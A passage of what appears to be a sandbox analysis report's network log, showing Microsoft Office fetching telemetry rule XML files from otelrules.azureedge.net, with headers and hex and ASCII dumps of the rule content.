                                                                                                                                                                                  Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                  2024-11-23 13:47:02 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                  2024-11-23 13:47:02 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                  2024-11-23 13:47:02 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  15192.168.2.44978513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:03 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:04 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:04 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 3788
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                  x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134704Z-174c587ffdf59vqchC1TEByk68000000031000000000mrex
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:04 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  16192.168.2.44978713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:03 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:04 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2980
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                  x-ms-request-id: d279acb6-501e-0029-6110-3dd0b8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134704Z-178bfbc474b9xljthC1NYCtw9400000004ag00000000k21y
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:04 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  17192.168.2.44978613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:03 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:04 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 450
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                  ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                  x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134704Z-178bfbc474bwh9gmhC1NYCy3rs00000004ng000000007bxm
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:04 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  18192.168.2.44978813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:03 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:04 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 408
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                  x-ms-request-id: e7cf57de-301e-006e-404d-3cf018000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134704Z-15b8b599d88tmlzshC1TEB4xpn00000002z0000000004gua
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:04 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  19192.168.2.44978913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:04 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:04 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2160
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                  x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134704Z-178bfbc474bv7whqhC1NYC1fg400000004ng000000001h5k
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:04 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  20192.168.2.44980413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:06 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                  x-ms-request-id: 51fbd25c-e01e-0020-5e4d-3cde90000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134706Z-15b8b599d88f9wfchC1TEBm2kc000000033000000000ctgp
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  21192.168.2.44980213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:06 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                  x-ms-request-id: e9522a88-801e-0067-2316-3dfe30000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134706Z-178bfbc474bfw4gbhC1NYCunf400000004g000000000d07s
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:07 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  22192.168.2.44980313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:06 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 632
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                  x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134706Z-178bfbc474bmqmgjhC1NYCy16c00000004n0000000008cvy
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:07 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  23192.168.2.44980113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:06 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:07 UTC470INHTTP/1.1 200 OK
